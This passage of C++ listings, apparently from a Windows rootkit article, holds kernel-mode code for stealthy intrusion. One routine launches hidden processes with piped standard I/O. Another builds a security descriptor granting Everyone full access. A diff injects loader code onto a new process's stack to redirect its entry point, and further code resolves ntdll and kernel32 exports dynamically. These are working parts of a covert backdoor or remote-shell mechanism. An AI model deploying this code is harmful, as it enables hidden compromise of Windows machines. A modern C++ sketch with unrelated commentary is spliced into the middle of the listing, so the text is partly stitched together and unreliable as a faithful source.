      NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &m,
                      MEM_COMMIT, PAGE_READWRITE);
   ZwWriteVirtualMemory(hProcess, p, &dummy, n, 0);
   return PWSTR(p);
}

// Clone of Ntdll::RtlCreateProcessParameters...
VOID RtlCreateProcessParameters(NT::PPROCESS_PARAMETERS* pp,
                                           NT::PUNICODE_STRING      ImageFile,
                                           NT::PUNICODE_STRING      DllPath,
                                           NT::PUNICODE_STRING      CurrentDirectory,
                                           NT::PUNICODE_STRING      CommandLine,
                                           ULONG      CreationFlag,
                                           NT::PUNICODE_STRING      WindowTitle,
                                           NT::PUNICODE_STRING      Desktop,
                                           NT::PUNICODE_STRING      Reserved,
                                           NT::PUNICODE_STRING      Reserved2){

      NT::PROCESS_PARAMETERS*      lpp;

      ULONG      Size=sizeof(NT::PROCESS_PARAMETERS);
      if(ImageFile) Size+=ImageFile->MaximumLength;
      if(DllPath) Size+=DllPath->MaximumLength;
      if(CurrentDirectory) Size+=CurrentDirectory->MaximumLength;
      if(CommandLine) Size+=CommandLine->MaximumLength;
      if(WindowTitle) Size+=WindowTitle->MaximumLength;
      if(Desktop) Size+=Desktop->MaximumLength;
      if(Reserved) Size+=Reserved->MaximumLength;
      if(Reserved2) Size+=Reserved2->MaximumLength;

      //Allocate the buffer..
      *pp=(NT::PPROCESS_PARAMETERS)NT::ExAllocatePool(NT::NonPagedPool,Size);
      lpp=*pp;
      RtlZeroMemory(lpp,Size);

      lpp->AllocationSize=PAGE_SIZE;
      lpp->Size=sizeof(NT::PROCESS_PARAMETERS); // Unicode size will be added (if any)
      lpp->hStdInput=0;
      lpp->hStdOutput=0;
      lpp->hStdError=0;
      if(CurrentDirectory){
           lpp->CurrentDirectoryName.Length=CurrentDirectory->Length;
           lpp->CurrentDirectoryName.MaximumLength=CurrentDirectory->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,CurrentDirectory->Buffer,CurrentDirectory->Length);
           lpp->CurrentDirectoryName.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=CurrentDirectory->MaximumLength;
      }
      if(DllPath){
           lpp->DllPath.Length=DllPath->Length;
           lpp->DllPath.MaximumLength=DllPath->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,DllPath->Buffer,DllPath->Length);
           lpp->DllPath.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=DllPath->MaximumLength;
      }
      if(ImageFile){
           lpp->ImageFile.Length=ImageFile->Length;
           lpp->ImageFile.MaximumLength=ImageFile->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,ImageFile->Buffer,ImageFile->Length);
           lpp->ImageFile.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=ImageFile->MaximumLength;
      }
      if(CommandLine){
           lpp->CommandLine.Length=CommandLine->Length;
           lpp->CommandLine.MaximumLength=CommandLine->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,CommandLine->Buffer,CommandLine->Length);
           lpp->CommandLine.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=CommandLine->MaximumLength;
      }
      if(WindowTitle){
           lpp->WindowTitle.Length=WindowTitle->Length;
           lpp->WindowTitle.MaximumLength=WindowTitle->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,WindowTitle->Buffer,WindowTitle->Length);
           lpp->WindowTitle.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=WindowTitle->MaximumLength;
      }
      if(Desktop){
           lpp->Desktop.Length=Desktop->Length;
           lpp->Desktop.MaximumLength=Desktop->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Desktop->Buffer,Desktop->Length);
           lpp->Desktop.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=Desktop->MaximumLength;
      }
      if(Reserved){
           lpp->Reserved2.Length=Reserved->Length;
           lpp->Reserved2.MaximumLength=Reserved->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Reserved->Buffer,Reserved->Length);
           lpp->Reserved2.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=Reserved->MaximumLength;
      }
/*      if(Reserved2){
           lpp->Reserved3.Length=Reserved2->Length;
           lpp->Reserved3.MaximumLength=Reserved2->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Reserved2->Buffer,Reserved2->Length);
           lpp->Reserved3.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=Reserved2->MaximumLength;
      }*/
}

VOID CreateProcessParameters(HANDLE hProcess, NT::PPEB Peb,
                    NT::PUNICODE_STRING ImageFile, HANDLE hPipe)
{
   NT::PPROCESS_PARAMETERS pp;
      NT::UNICODE_STRING           CurrentDirectory;                     
      NT::UNICODE_STRING           DllPath;                     

      NT::RtlInitUnicodeString(&CurrentDirectory,L"C:\\WINNT\\SYSTEM32\\");
      NT::RtlInitUnicodeString(&DllPath,L"C:\\;C:\\WINNT\\;C:\\WINNT\\SYSTEM32\\");
      


   RtlCreateProcessParameters(&pp, ImageFile, &DllPath,&CurrentDirectory, ImageFile, 0, 0, 0, 0, 0);
      
      pp->hStdInput=hPipe;
   pp->hStdOutput=hPipe;//hStdOutPipe;
   pp->hStdError=hPipe;//hStdOutPipe;
      pp->dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
      pp->wShowWindow=SW_HIDE;//CREATE_NO_WINDOW;

   pp->Environment = InitEnvironment(hProcess);
      
   ULONG n = pp->Size;
   PVOID p = 0;
   NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_READWRITE);

   ZwWriteVirtualMemory(hProcess, p, pp, pp->Size, 0);

   ZwWriteVirtualMemory(hProcess, PCHAR(Peb) + 0x10, &p, sizeof p, 0);

   RtlDestroyProcessParameters(pp);
}

namespace NT {
extern "C" {
DWORD WINAPI RtlCreateAcl(PACL acl,DWORD size,DWORD rev);
BOOL    WINAPI RtlAddAccessAllowedAce(PACL,DWORD,DWORD,PSID);
}}

NTSTATUS BuildAlowingSD(PSECURITY_DESCRIPTOR *pSecurityDescriptor)
{
      //_asm int 3;
      SID SeWorldSid={SID_REVISION, 1, SECURITY_WORLD_SID_AUTHORITY, SECURITY_WORLD_RID};
      SID localSid={SID_REVISION, 1, SECURITY_NT_AUTHORITY, SECURITY_LOCAL_SYSTEM_RID};
      char daclbuf[PAGE_SIZE];
      NT::PACL dacl = (NT::PACL)&daclbuf;
      char sdbuf[PAGE_SIZE];
      NT::PSECURITY_DESCRIPTOR sd = &sdbuf;
      
      NTSTATUS status = NT::RtlCreateAcl(dacl, PAGE_SIZE, ACL_REVISION);
   if (!NT_SUCCESS(status)) return status;
   status = NT::RtlAddAccessAllowedAce(dacl, ACL_REVISION, FILE_ALL_ACCESS, &SeWorldSid);
   if (!NT_SUCCESS(status)) return status;
   RtlZeroMemory(sd, PAGE_SIZE);
   status = NT::RtlCreateSecurityDescriptor(sd, SECURITY_DESCRIPTOR_REVISION);
   if (!NT_SUCCESS(status)) return status;
   status = RtlSetOwnerSecurityDescriptor(sd, &localSid, FALSE);
   if (!NT_SUCCESS(status)) return status;
   status = NT::RtlSetDaclSecurityDescriptor(sd, TRUE, dacl, FALSE);
   if (!NT_SUCCESS(status)) return status;
   if (!NT::RtlValidSecurityDescriptor(sd)) {
      _asm int 3;
   }
      
      //To try!
      ULONG buflen = PAGE_SIZE*2;
      *pSecurityDescriptor = NT::ExAllocatePool(NT::PagedPool, buflen);
   if (!*pSecurityDescriptor) return STATUS_INSUFFICIENT_RESOURCES;
      return RtlAbsoluteToSelfRelativeSD(sd, *pSecurityDescriptor, &buflen);
}

#define PIPE_NAME_MAX 40*2

extern "C" NTSTATUS myCreatePipe1(PHANDLE phPipe, NT::PUNICODE_STRING PipeName, IN ACCESS_MASK DesiredAccess, PSECURITY_DESCRIPTOR sd, ULONG ShareAccess)
{
      NT::IO_STATUS_BLOCK           iosb;
      
      NT::OBJECT_ATTRIBUTES attr = {sizeof attr, 0, PipeName, OBJ_INHERIT, sd};
      NT::LARGE_INTEGER nTimeOut;
      nTimeOut.QuadPart = (__int64)-1E7;
      return ZwCreateNamedPipeFile(phPipe, DesiredAccess | SYNCHRONIZE | FILE_ATTRIBUTE_TEMPORARY, &attr, &iosb, ShareAccess,
           FILE_CREATE, 0, FALSE, FALSE, FALSE, 1, 0x1000, 0x1000, &nTimeOut);      
}

int exec_piped(NT::PUNICODE_STRING name, NT::PUNICODE_STRING PipeName)
{
   HANDLE hProcess, hThread, hSection, hFile;
      
      //_asm int 3;

   NT::OBJECT_ATTRIBUTES oa = {sizeof oa, 0, name, OBJ_CASE_INSENSITIVE};
   NT::IO_STATUS_BLOCK iosb;
   NT::ZwOpenFile(&hFile, FILE_EXECUTE | SYNCHRONIZE, &oa, &iosb,
             FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);

   oa.ObjectName = 0;
      
   NT::ZwCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, 0,
                PAGE_EXECUTE, SEC_IMAGE, hFile);

   NT::ZwClose(hFile);

      ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa,
                NtCurrentProcess(), TRUE, hSection, 0, 0);
      
   NT::SECTION_IMAGE_INFORMATION sii;
   NT::ZwQuerySection(hSection, NT::SectionImageInformation,
                &sii, sizeof sii, 0);

   NT::ZwClose(hSection);

   NT::USER_STACK stack = {0};

   ULONG n = sii.StackReserve;
   NT::ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,
                      MEM_RESERVE, PAGE_READWRITE);

   stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom)
                    + sii.StackReserve;
   stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase)
                     - sii.StackCommit;

      /* PAGE_EXECUTE_READWRITE is needed if initialisation code will be executed on stack*/
      n = sii.StackCommit + PAGE_SIZE;
   PVOID p = PCHAR(stack.ExpandableStackBase) - n;
   NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_EXECUTE_READWRITE);

   ULONG x; n = PAGE_SIZE;
   ZwProtectVirtualMemory(hProcess, &p, &n,
                     PAGE_READWRITE | PAGE_GUARD, &x);

   NT::CONTEXT context = {CONTEXT_FULL};
   context.SegGs = 0;
   context.SegFs = 0x38;
   context.SegEs = 0x20;
   context.SegDs = 0x20;
   context.SegSs = 0x20;
   context.SegCs = 0x18;
   context.EFlags = 0x3000;
   context.Esp = ULONG(stack.ExpandableStackBase) - 4;
   context.Eip = ULONG(sii.EntryPoint);

   NT::CLIENT_ID cid;

   ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,
                hProcess, &cid, &context, &stack, TRUE);

   NT::PROCESS_BASIC_INFORMATION pbi;
   NT::ZwQueryInformationProcess(hProcess, NT::ProcessBasicInformation,
                       &pbi, sizeof pbi, 0);
      
      HANDLE hPipe,hPipe1;
      oa.ObjectName = PipeName;
      oa.Attributes = OBJ_INHERIT;
      if(NT::ZwOpenFile(&hPipe1, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &oa, &iosb, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE)) return 0;
      NT::ZwDuplicateObject(NtCurrentProcess(), hPipe1, hProcess, &hPipe,
           0, 0, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE);
      
      CreateProcessParameters(hProcess, pbi.PebBaseAddress, name, hPipe);

   InformCsrss(hProcess, hThread,
           ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));
      
   ZwResumeThread(hThread, 0);

   NT::ZwClose(hProcess);
   NT::ZwClose(hThread);

   return int(cid.UniqueProcess);
}

int execute_piped(VOID *ImageFileName, NT::PUNICODE_STRING PipeName)
{
   NT::UNICODE_STRING ImageFile;
   NT::RtlInitUnicodeString(&ImageFile, (wchar_t *)ImageFileName);
   return exec_piped(&ImageFile, PipeName);
}
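
Note on the parameter block: the copy routine at the start of this listing
stores each string's offset from the start of the block in the Buffer field,
not a pointer, so the block stays valid after it is copied to another address.
The following is a minimal, portable sketch of that packing idea only. The
names PackedString, Block, build and read_string are hypothetical and belong
neither to the article's sources nor to the Native API.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Hypothetical stand-in for UNICODE_STRING: an offset replaces the pointer.
struct PackedString {
    std::uint16_t length;      // bytes in use
    std::uint16_t max_length;  // bytes reserved (includes the terminator)
    std::uint32_t offset;      // byte offset from the start of the block
};

// Hypothetical header; the real parameter block has many more fields.
struct Block {
    std::uint32_t size;        // header plus all string data, in bytes
    PackedString  image_file;
    PackedString  command_line;
};

// Build one contiguous block: header first, string data appended after it.
std::vector<unsigned char> build(const std::u16string& image,
                                 const std::u16string& cmd) {
    Block hdr{};
    hdr.size = sizeof(Block);
    std::vector<unsigned char> out(sizeof(Block));

    auto append = [&](PackedString& f, const std::u16string& s) {
        const std::size_t bytes = s.size() * sizeof(char16_t);
        f.length     = static_cast<std::uint16_t>(bytes);
        f.max_length = static_cast<std::uint16_t>(bytes + sizeof(char16_t));
        f.offset     = hdr.size;               // offset, not an address
        out.resize(hdr.size + f.max_length, 0);
        std::memcpy(out.data() + f.offset, s.data(), bytes);
        hdr.size += f.max_length;               // advance by the reserved size
    };
    append(hdr.image_file, image);
    append(hdr.command_line, cmd);

    std::memcpy(out.data(), &hdr, sizeof hdr);  // write the finished header
    return out;
}

// Resolve an offset against whatever address the block currently lives at.
std::u16string read_string(const std::vector<unsigned char>& blk,
                           const PackedString& f) {
    std::u16string s(f.length / sizeof(char16_t), u'\0');
    std::memcpy(&s[0], blk.data() + f.offset, f.length);
    return s;
}
```

Because only offsets are stored, a byte-for-byte copy of the vector can be
read back with read_string without fixing up any field.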


----[ 8.5 - NebbetCreateProcess.diff

268a269,384
> typedef
> WINBASEAPI
> BOOL
> (WINAPI
> *f_SetStdHandle)(
>    IN DWORD nStdHandle,
>    IN HANDLE hHandle
>    );
> typedef
> WINBASEAPI
> HANDLE
> (WINAPI
> *f_CreateFileW)(
>    IN LPCWSTR lpFileName,
>    IN DWORD dwDesiredAccess,
>    IN DWORD dwShareMode,
>    IN LPSECURITY_ATTRIBUTES lpSecurityAttributes,
>    IN DWORD dwCreationDisposition,
>    IN DWORD dwFlagsAndAttributes,
>    IN HANDLE hTemplateFile
>    );
> #ifdef _DEBUG
> typedef
> WINBASEAPI
> DWORD
> (WINAPI
> *f_GetLastError)(
>    VOID
>    );
> #endif
> typedef VOID (*f_EntryPoint)(VOID);
>
> struct s_data2embed
> {
>      wchar_t PipeName[PIPE_NAME_MAX];
>      //wchar_t RPipeName[PIPE_NAME_MAX], WPipeName[PIPE_NAME_MAX];
>      f_SetStdHandle pSetStdHandle;
>      f_CreateFileW pCreateFileW;
>      f_EntryPoint EntryPoint;
> #ifdef _DEBUG
>      f_GetLastError pGetLastError;
> #endif
> };
>
> //void before_code2embed(){};
> void code2embed(s_data2embed *embedded_data)
> {
>      HANDLE hPipe;
>
>      __asm int 3;
>      hPipe = embedded_data->pCreateFileW(embedded_data->PipeName,
>            GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE,
>            0/*FILE_SHARE_READ | FILE_SHARE_WRITE*/,
>            NULL,
>            OPEN_EXISTING,
>            0/*FILE_ATTRIBUTE_NORMAL*/,
>            NULL);
>      embedded_data->pGetLastError();
>      /*//if (hRPipe==INVALID_HANDLE_VALUE) goto cont;
>      hWPipe = embedded_data->pCreateFileW(embedded_data->WPipeName,
>            GENERIC_WRITE | SYNCHRONIZE,
>            FILE_SHARE_READ /*| FILE_SHARE_WRITE*,
>            NULL,
>            OPEN_EXISTING,
>            0,
>            NULL);
>      embedded_data->pGetLastError();
>      if ((hRPipe!=INVALID_HANDLE_VALUE)&&(hWPipe!=INVALID_HANDLE_VALUE)) */
>      if (hPipe!=INVALID_HANDLE_VALUE)
>      {
>            embedded_data->pSetStdHandle(STD_INPUT_HANDLE, hPipe);
>            embedded_data->pSetStdHandle(STD_OUTPUT_HANDLE, hPipe);
>            embedded_data->pSetStdHandle(STD_ERROR_HANDLE, hPipe);
>      }
>      embedded_data->EntryPoint();
> }
> __declspec(naked) void after_code2embed(){};
> #define sizeof_code2embed ((ULONG)&after_code2embed-(ULONG)&code2embed)
>
> void redir2pipe(HANDLE hProcess, wchar_t *PipeName/*, wchar_t *WPipeName*/, PVOID EntryPoint, PVOID pStack, /*OUT PULONG pData,*/ OUT PULONG pCode, OUT PULONG pNewStack)
> {
>      s_data2embed data2embed;
>      PVOID pKERNEL32;
>      NT::UNICODE_STRING ModuleFileName;
>      
>      _asm int 3;
>
>      *pCode = 0;
>      *pNewStack = 0;
>      NT::RtlInitUnicodeString(&ModuleFileName, L"kernel32.dll");
>      LdrGetDllHandle(NULL, NULL, &ModuleFileName, &pKERNEL32);
>      if (!pKERNEL32) return;
>      data2embed.pSetStdHandle=(f_SetStdHandle)FindFunc(pKERNEL32, "SetStdHandle");
>      data2embed.pCreateFileW=(f_CreateFileW)FindFunc(pKERNEL32, "CreateFileW");
> #ifdef _DEBUG
>      data2embed.pGetLastError=(f_GetLastError)FindFunc(pKERNEL32, "GetLastError");
> #endif
>      if ((!data2embed.pSetStdHandle)||(!data2embed.pCreateFileW)) return;
>      data2embed.EntryPoint=(f_EntryPoint)EntryPoint;
>      wcscpy(data2embed.PipeName, PipeName);
>      //wcscpy(data2embed.WPipeName, WPipeName);
>      char* p = (char*)pStack - sizeof_code2embed;
>      if (ZwWriteVirtualMemory(hProcess, p, &code2embed, sizeof_code2embed, 0)) return;
>      *pCode = (ULONG)p;
>      
>      p -= sizeof s_data2embed;
>      if (ZwWriteVirtualMemory(hProcess, p, &data2embed, sizeof s_data2embed, 0)) return;
>      
>      PVOID pData = (PVOID)p;
>      p -= sizeof pData;
>      if (ZwWriteVirtualMemory(hProcess, p, &pData, sizeof pData, 0)) return;
>      
>      p -= 4;
>      *pNewStack = (ULONG)p;
> }
>
317a434,437
>      ULONG newEIP, NewStack;
>      redir2pipe(hProcess, PipeName->Buffer, sii.EntryPoint, stack.ExpandableStackBase, &newEIP, &NewStack);
>      if ((!NewStack)||(!newEIP)) return 0;
>
326,327c446,449
<    context.Esp = ULONG(stack.ExpandableStackBase) - 4;
<    context.Eip = ULONG(sii.EntryPoint);
---
>      //loader code is on the stack
>      context.Esp = NewStack;
>    context.Eip = newEIP;


----[ 8.6 - NtdllDynamicLoader.cpp

#include <ntdll.h>
//#include "UndocKernel.h"
#include "DynLoadFromNtdll.h"

//Example A.2 from Nebbett's book

//Search loaded module by name
PVOID FindModule(char *module)
{
      ULONG n;
      //Request necessary size of buffer
      NT::ZwQuerySystemInformation(NT::SystemModuleInformation,
                      &n, 0, &n);
      //Allocate memory for n structures
   PULONG q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
      //Request information about modules
   NT::ZwQuerySystemInformation(NT::SystemModuleInformation,
                      q, n * sizeof *q, 0);

      //Module counter located at address q, information begins at q+1
   NT::PSYSTEM_MODULE_INFORMATION p
      = NT::PSYSTEM_MODULE_INFORMATION(q + 1);
   PVOID ntdll = 0;

      //Cycle for each module ...
      for (ULONG i = 0; i < *q; i++)
      {
           //...compare its name with the one sought...
           if (_stricmp(p[i].ImageName + p[i].ModuleNameOffset,
              module) == 0)
           {
                //...and stop if module found
                ntdll = p[i].Base;
                break;
           }
      }
      //Free memory
   NT::ExFreePool(q);
   return ntdll;
}

PVOID FindNT()
{
   return FindModule("ntdll.dll");
}

//Search for the exported function called Name in the module loaded at address Base
PVOID FindFunc(PVOID Base, PCSTR Name)
{
      //At address Base there is the DOS EXE header
      PIMAGE_DOS_HEADER dos = PIMAGE_DOS_HEADER(Base);
      //Extract offset of PE-header from it
   PIMAGE_NT_HEADERS nt = PIMAGE_NT_HEADERS(PCHAR(Base) + dos->e_lfanew);
      //Get a pointer to the data-directory entry
      //that describes the export table
   PIMAGE_DATA_DIRECTORY expdir
      = nt->OptionalHeader.DataDirectory + IMAGE_DIRECTORY_ENTRY_EXPORT;
      //Extract address and size of that table
   ULONG size = expdir->Size;
   ULONG addr = expdir->VirtualAddress;

      //Evaluate pointers:
      // - to directory of exported functions
   PIMAGE_EXPORT_DIRECTORY exports
      = PIMAGE_EXPORT_DIRECTORY(PCHAR(Base) + addr);
      // - to table of addresses
   PULONG functions = PULONG(PCHAR(Base) + exports->AddressOfFunctions);
      // - to table of ordinals
   PSHORT ordinals  = PSHORT(PCHAR(Base) + exports->AddressOfNameOrdinals);
      // - to table of names
   PULONG names    = PULONG(PCHAR(Base) + exports->AddressOfNames);

   //Cycle through table of names ...
      for (ULONG i = 0; i < exports->NumberOfNames; i++) {
           //The ordinal that matches the name is an index into the table of addresses
      ULONG ord = ordinals[i];
           //Check that the address lies outside the export directory (i.e. it is not a forwarder)
      if (functions[ord] < addr  ||  functions[ord] >= addr + size) {
                //If the function name matches the one sought...
        if (strcmp(PSTR(PCHAR(Base) + names[i]), Name) == 0)